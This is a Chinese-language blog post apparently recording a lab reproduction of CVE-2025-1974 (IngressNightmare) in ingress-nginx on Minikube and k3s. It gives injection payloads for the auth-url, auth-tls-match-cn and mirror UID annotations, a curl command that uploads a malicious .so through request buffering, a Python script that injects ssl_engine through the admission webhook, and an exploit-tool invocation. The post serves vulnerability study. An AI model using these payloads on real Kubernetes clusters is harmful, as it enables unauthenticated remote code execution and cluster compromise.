<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/avatar-1080x1080.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/avatar-1080x1080.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/avatar-1080x1080.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"l1nk.icu","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="Ingress-Nginx Nightmare CVE-2025-1974 复现~学学 k8s">
<meta property="og:type" content="article">
<meta property="og:title" content="Ingress-Nginx Nightmare 复现~">
<meta property="og:url" content="http://l1nk.icu/2025/04/16/Ingress-Nginx%20Nightmare%20%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="L1nk&#39;s Blog">
<meta property="og:description" content="Ingress-Nginx Nightmare CVE-2025-1974 复现~学学 k8s">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-04-15T16:00:00.000Z">
<meta property="article:modified_time" content="2025-04-15T16:00:00.000Z">
<meta property="article:author" content="l1nk">
<meta property="article:tag" content="blog">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://l1nk.icu/2025/04/16/Ingress-Nginx%20Nightmare%20%E5%A4%8D%E7%8E%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://l1nk.icu/2025/04/16/Ingress-Nginx%20Nightmare%20%E5%A4%8D%E7%8E%B0/","path":"2025/04/16/Ingress-Nginx Nightmare 复现/","title":"Ingress-Nginx Nightmare 复现~"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Ingress-Nginx Nightmare 复现~ | L1nk's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">L1nk's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">漏洞描述</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CVE-2025-1974"><span class="nav-number">1.1.</span> <span class="nav-text">CVE-2025-1974</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="nav-number">1.2.</span> <span class="nav-text">利用过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%B0%E9%9A%BE%E7%82%B9"><span class="nav-number">1.3.</span> <span class="nav-text">困难点</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.1.</span> <span class="nav-text">环境搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Minikube"><span class="nav-number">2.1.1.</span> <span class="nav-text">Minikube</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#k3s"><span class="nav-number">2.1.2.</span> <span class="nav-text">k3s</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E8%AF%91-so-%E6%96%87%E4%BB%B6"><span class="nav-number">2.2.</span> <span class="nav-text">编译 so 文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%9D%9E%E7%9B%B2%E6%89%93%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.3.</span> <span class="nav-text">非盲打复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP-%E7%9B%B2%E6%89%93"><span class="nav-number">2.4.</span> <span class="nav-text">EXP 盲打</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%93%E8%AF%AD"><span class="nav-number">3.</span> <span class="nav-text">结语</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="l1nk"
      src="/images/avatar-1080x1080.png">
  <p class="site-author-name" itemprop="name">l1nk</p>
  <div class="site-description" itemprop="description">Vidar-Team Web | Student</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kn1l" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kn1l" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:l1nk@foxmail.com" title="E-Mail → mailto:l1nk@foxmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/l1nkowo" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;l1nkowo" rel="noopener me" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          Links
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <a href="https://www.kinoko.fun/" title="https:&#x2F;&#x2F;www.kinoko.fun&#x2F;" rel="noopener" target="_blank">Kinoko</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://tech.ec3o.fun/" title="https:&#x2F;&#x2F;tech.ec3o.fun&#x2F;" rel="noopener" target="_blank">Ec3o</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://www.z221x.website/" title="https:&#x2F;&#x2F;www.z221x.website&#x2F;" rel="noopener" target="_blank">z221x</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://blog.4db.icu/" title="https:&#x2F;&#x2F;blog.4db.icu&#x2F;" rel="noopener" target="_blank">Fc04dB</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://blog.naclwww.com/" title="https:&#x2F;&#x2F;blog.naclwww.com&#x2F;" rel="noopener" target="_blank">NaCl</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://blog.kiracoon.top/" title="https:&#x2F;&#x2F;blog.kiracoon.top&#x2F;" rel="noopener" target="_blank">Kiracoon</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://mysid.top/" title="https:&#x2F;&#x2F;mysid.top&#x2F;" rel="noopener" target="_blank">mysid</a>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://l1nk.icu/2025/04/16/Ingress-Nginx%20Nightmare%20%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar-1080x1080.png">
      <meta itemprop="name" content="l1nk">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L1nk's Blog">
      <meta itemprop="description" content="Vidar-Team Web | Student">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Ingress-Nginx Nightmare 复现~ | L1nk's Blog">
      <meta itemprop="description" content="Ingress-Nginx Nightmare CVE-2025-1974 复现~学学 k8s">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Ingress-Nginx Nightmare 复现~
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-04-16 00:00:00" itemprop="dateCreated datePublished" datetime="2025-04-16T00:00:00+08:00">2025-04-16</time>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>1.4k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>5 mins.</span>
    </span>
</div>

            <div class="post-description">Ingress-Nginx Nightmare CVE-2025-1974 复现~学学 k8s</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p> 什么是 Ingress-Nginx？</p>
<blockquote>
<p>ingress-nginx is an Ingress controller for Kubernetes using <a target="_blank" rel="noopener" href="https://www.nginx.org/">NGINX</a> as a reverse proxy and load balancer.</p>
</blockquote>
<p><code>Ingress</code> 可以用来暴露服务给外部用户，用于作为访问集群的入口。<code>Ingress-nginx</code> 是一个基于 NGINX 的 <code>Ingress controller</code> ，使用 NGINX 作为反向代理和负载均衡器。</p>
<p>由于复现过程中发现我的本地环境里 <code>pid</code> 和 <code>fd</code> 比较随机，很难使用 exp 跑通，盲打很折磨，所以这里主要记录非盲打的复现</p>
<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><h3 id="CVE-2025-1974"><a href="#CVE-2025-1974" class="headerlink" title="CVE-2025-1974"></a>CVE-2025-1974</h3><p>由于 ingress-nginx-controller-admission 无需认证即可通过集群中的任意 pod 网络访问，攻击者可以通过向 ingress-nginx 发送特制的 AdmissionReview 请求，远程注入任意的 NGINX 配置，ingress-nginx 在其后会对 nginx 配置进行测试，从而触发埋藏的恶意指令，导致 Ingress-nginx 中的任意代码执行。</p>
<p>配置注入提供了三种方式 <code>CVE-2025-24514 - auth-url injection</code>、<code>CVE-2025-1097 - auth-tls-match-cn injection</code>、<code>CVE-2025-1098 – mirror UID injection</code>，原理类似于模板注入，当 Ingress Nginx Controller 处理传入的 AdmissionReview 请求时，它会根据模板文件和提供的 Ingress 对象生成一个临时 NGINX 配置文件。</p>
<p>auth-url</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">&quot;annnotations&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span>   </span><br><span class="line"> <span class="attr">&quot;nginx.ingress.kubernetes.io/auth-url&quot;</span><span class="punctuation">:</span> <span class="string">&quot;http://example.com/#;&#125;&#125;&#125;\n\nssl_engine foobar;\n\n&quot;</span>  </span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>auth-tls-match-cn</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">&quot;annotations&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span>   </span><br><span class="line"> <span class="attr">&quot;nginx.ingress.kubernetes.io/auth-tls-match-cn&quot;</span><span class="punctuation">:</span> <span class="string">&quot;CN=abc #(\n)&#123;&#125;\n &#125;&#125;\nssl_engine foobar;\n#&quot;</span><span class="punctuation">,</span>    </span><br><span class="line"> <span class="attr">&quot;nginx.ingress.kubernetes.io/auth-tls-secret&quot;</span><span class="punctuation">:</span> <span class="string">&quot;kube-system/cillium-tls&quot;</span>  </span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>mirror UID</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">&quot;metadata&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line"> <span class="attr">&quot;uid&quot;</span><span class="punctuation">:</span> <span class="string">&quot;InjectTest#;\n\n&#125;\n&#125;\n&#125;\nssl_engine foobar&quot;</span><span class="punctuation">,</span> </span><br><span class="line"> <span class="attr">&quot;annotations&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span> </span><br><span class="line">  <span class="attr">&quot;nginx.ingress.kubernetes.io/mirror-target&quot;</span><span class="punctuation">:</span> <span class="string">&quot;fake-mirror-target&quot;</span></span><br><span class="line"> <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><code>ssl_engine</code> 指令本来是用于指定一个 ssl 加速引擎，可能是一个 so 文件，这里用来加载我们的恶意 so 文件</p>
<p>有关上传 so 文件的方式，在 nginx 接收到大请求（&gt;8KB）时，会把请求保存到一个临时文件，可以利用这一点上传恶意的 so 文件</p>
<p>在文件被删除前进行模板注入完成 rce</p>
<p>影响版本</p>
<ul>
<li>ingress-nginx≤ 1.11.4</li>
<li>ingress-nginx&#x3D;1.12.0</li>
</ul>
<h3 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h3><ul>
<li>向 nginx 发送请求上传恶意 so 文件</li>
<li>向 admission 发送 AdmissionReview 请求在配置中注入 <code>ssl_engine</code> 加载 so 文件 rce</li>
</ul>
<h3 id="困难点"><a href="#困难点" class="headerlink" title="困难点"></a>困难点</h3><ul>
<li>上传 so 文件时需要维持长时间的 http 连接保证 fd 开放</li>
<li>因为创建请求的进程和处理 AdmissionReview 的进程不是同一个所以不能使用 <code>/proc/self</code> 需要爆破 <code>pid</code> 和 <code>fd</code></li>
</ul>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><h4 id="Minikube"><a href="#Minikube" class="headerlink" title="Minikube"></a>Minikube</h4><p>用 Minikube+ 端口转发搭建一个简易的复现环境</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">minikube start</span><br></pre></td></tr></table></figure>

<p>部署 ingress-nginx</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.11.2/deploy/static/provider/cloud/deploy.yaml</span><br><span class="line"></span><br><span class="line"><span class="comment">#下面两条命令用于换源</span></span><br><span class="line">sed -i <span class="string">&#x27;s#registry.k8s.io/ingress-nginx/controller:v1.11.2@sha256:d5f8217feeac4887cb1ed21f27c2674e58be06bd8f5184cacea2a69abaf78dce#registry.aliyuncs.com/google_containers/nginx-ingress-controller:v1.11.2#g&#x27;</span> deploy.yaml</span><br><span class="line"> </span><br><span class="line">sed -i <span class="string">&#x27;s#registry.k8s.io/ingress-nginx/kube-webhook-certgen:v1.4.3@sha256:a320a50cc91bd15fd2d6fa6de58bd98c1bd64b9a6f926ce23a600d87043455a3#registry.aliyuncs.com/google_containers/kube-webhook-certgen:v1.4.3#g&#x27;</span> deploy.yaml</span><br><span class="line"></span><br><span class="line"><span class="comment"># 部署</span></span><br><span class="line">kubectl apply -f deploy.yaml</span><br></pre></td></tr></table></figure>

<p>如果想便于本地测试可以配置一下端口转发</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">kubectl port-forward -n ingress-nginx ingress-nginx-controller-dbcb5c6f7-dz2rj 8443:8443</span><br><span class="line"></span><br><span class="line">kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80</span><br></pre></td></tr></table></figure>

<h4 id="k3s"><a href="#k3s" class="headerlink" title="k3s"></a>k3s</h4><p>用 k3s+ 一个 Python Pod 模拟失陷 Pod 构建一个较为真实的复现环境</p>
<p>安装 k3s</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -sfL https://get.k3s.io | sh -</span><br></pre></td></tr></table></figure>

<p>部署 ingress-nginx</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.11.4/deploy/static/provider/cloud/deploy.yaml</span><br><span class="line"></span><br><span class="line"><span class="comment"># else use helm</span></span><br><span class="line">helm upgrade --install ingress-nginx ingress-nginx --repo https://kubernetes.github.io/ingress-nginx --namespace ingress-nginx --create-namespace --version 4.11.4 --kubeconfig /etc/rancher/k3s/k3s.yaml</span><br></pre></td></tr></table></figure>

<p>py-pod.yaml</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">apiVersion:</span> <span class="string">v1</span></span><br><span class="line"><span class="attr">kind:</span> <span class="string">Pod</span></span><br><span class="line"><span class="attr">metadata:</span></span><br><span class="line">  <span class="attr">name:</span> <span class="string">py-pod</span></span><br><span class="line"><span class="attr">spec:</span></span><br><span class="line">  <span class="attr">containers:</span></span><br><span class="line">  <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">py</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">python:3.13.2</span></span><br><span class="line">	<span class="attr">command:</span> [<span class="string">&quot;bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;while true; do sleep 3600; done&quot;</span>]</span><br></pre></td></tr></table></figure>

<p>部署 Python Pod</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl apply -f py-pod.yaml</span><br></pre></td></tr></table></figure>

<h3 id="编译-so-文件"><a href="#编译-so-文件" class="headerlink" title="编译 so 文件"></a>编译 so 文件</h3><p>使用 <a target="_blank" rel="noopener" href="https://github.com/yoshino-s/CVE-2025-1974">yoshino-s&#x2F;CVE-2025-1974</a></p>
<p>接下来我们还要用到这个项目中的 <code>req.json</code></p>
<h3 id="非盲打复现"><a href="#非盲打复现" class="headerlink" title="非盲打复现"></a>非盲打复现</h3><p>修改配置文件，让 ingress-nginx pod 的运行权限为 root 方便我们查看 fd</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl edit deploy ingress-nginx-controller -n ingress-nginx</span><br></pre></td></tr></table></figure>

<p>修改 spec.template.spec.containers.args.securityContext 处配置，修改后的 securityContext 配置如下：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">securityContext:</span></span><br><span class="line">  <span class="attr">allowPrivilegeEscalation:</span> <span class="literal">true</span></span><br><span class="line">  <span class="attr">capabilities:</span></span><br><span class="line">	<span class="attr">add:</span></span><br><span class="line">	<span class="bullet">-</span> <span class="string">NET_BIND_SERVICE</span></span><br><span class="line">	<span class="attr">drop:</span></span><br><span class="line">	<span class="bullet">-</span> <span class="string">ALL</span></span><br><span class="line">  <span class="attr">privileged:</span> <span class="literal">true</span></span><br><span class="line">  <span class="attr">readOnlyRootFilesystem:</span> <span class="literal">false</span></span><br><span class="line">  <span class="attr">runAsNonRoot:</span> <span class="literal">false</span></span><br><span class="line">  <span class="attr">runAsUser:</span> <span class="number">0</span></span><br><span class="line">  <span class="attr">seccompProfile:</span></span><br><span class="line">	<span class="attr">type:</span> <span class="string">RuntimeDefault</span></span><br></pre></td></tr></table></figure>

<p>发送大请求上传 so 文件</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST http://ingress-nginx-controller.ingress-nginx.svc/fake/addr --data-binary @shell.so -H <span class="string">&quot;Content-Length: 165760&quot;</span> -H <span class="string">&quot;Content-Type: application/octet-stream&quot;</span> -H <span class="string">&quot;Connection: keep-alive&quot;</span></span><br></pre></td></tr></table></figure>

<p>查看缓存请求文件的 fd</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">kubectl <span class="built_in">exec</span> -it ingress-nginx-controller-7955d94d58-n54f5  -n ingress-nginx -- /bin/bash</span><br><span class="line"></span><br><span class="line"><span class="built_in">ls</span> /proc/*/fd/* -al | grep client</span><br></pre></td></tr></table></figure>

<p>发送请求进行配置注入</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">admission_url = <span class="string">&#x27;https://ingress-nginx-controller-admission.ingress-nginx.svc:443/networking/v1/ingresses&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;req.json&quot;</span>, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = json.load(f)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">load</span>():</span><br><span class="line">    fdpath = <span class="string">&#x27;/proc/126/fd/33&#x27;</span></span><br><span class="line">    data[<span class="string">&quot;request&quot;</span>][<span class="string">&quot;object&quot;</span>][<span class="string">&quot;metadata&quot;</span>][<span class="string">&quot;annotations&quot;</span>][</span><br><span class="line">            <span class="string">&quot;nginx.ingress.kubernetes.io/auth-url&quot;</span>] = <span class="string">&quot;http://example.com/#;&#125;&#125;&#125;\n\nssl_engine %s;\n\n&quot;</span> % (fdpath,)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        res = requests.post(admission_url, json=data, verify=<span class="literal">False</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[+]testing&quot;</span> + <span class="string">&quot; &quot;</span> + fdpath)</span><br><span class="line">        <span class="built_in">print</span>(res.text)</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[!]&quot;</span> + <span class="string">&quot; error parsing response&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(e)</span><br><span class="line"></span><br><span class="line">load()</span><br></pre></td></tr></table></figure>

<p>然后就可以查收你的 shell 了☝️🤓</p>
<h3 id="EXP-盲打"><a href="#EXP-盲打" class="headerlink" title="EXP 盲打"></a>EXP 盲打</h3><p>推荐使用 <a target="_blank" rel="noopener" href="https://github.com/Esonhugh/ingressNightmare-CVE-2025-1974-exps">Esonhugh&#x2F;ingressNightmare-CVE-2025-1974-exps: IngressNightmare POC. </a></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"><span class="built_in">export</span> INGRESS=https://ingress-nginx-controller-admission.ingress-nginx.svc:443/networking/v1/ingresses</span><br><span class="line"><span class="built_in">export</span> UPLOADER=http://ingress-nginx-controller.ingress-nginx.svc/fake/addr</span><br><span class="line">./ingressnightmare -m c  -c <span class="string">&#x27;date &gt;&gt; /tmp/pwn; echo hi &gt;&gt; /tmp/pwn&#x27;</span> -i <span class="variable">$&#123;INGRESS&#125;</span> -u <span class="variable">$&#123;UPLOADER&#125;</span></span><br></pre></td></tr></table></figure>

<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>协会分享会上分享了一下复现过程，顺便水一篇博客记录一下😋。</p>
<p>在复现学习过程中阅读了挺多网上的文章，大部分或多或少感觉都有点问题，有些根本不可能跑得通的 exp 也往上放😓，当然也有对我帮助很大的，也很感谢 eson 师傅对我问题的一些解答。</p>
<p>关于这个洞，我自己在复现中观察到本地环境的 pid 和 fd 还是比较随机的，盲打还是很折磨的，各种奇怪的报错也很多，我用 exp 跑差不多就靠运气跑成过一次，所以本篇主要目的还是分享一下怎么掌控整个过程的信息帮助复现，学习漏洞利用的流程🤓。</p>
<p>参考链接：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/Esonhugh/ingressNightmare-CVE-2025-1974-exps">Esonhugh&#x2F;ingressNightmare-CVE-2025-1974-exps: IngressNightmare POC. world first remote exploitation and with multi-advanced exploitation methods. allow on disk exploitation. CVE-2025-24514 - auth-url injection, CVE-2025-1097 - auth-tls-match-cn injection, CVE-2025-1098 – mirror UID injection – all available</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/yoshino-s/CVE-2025-1974">yoshino-s&#x2F;CVE-2025-1974</a></li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/06/frp/" rel="prev" title="frp v0.1.0 源码学习">
                  <i class="fa fa-angle-left"></i> frp v0.1.0 源码学习
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/09/22/Season9-Expressway/" rel="next" title="[Season9] Expressway WP">
                  [Season9] Expressway WP <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
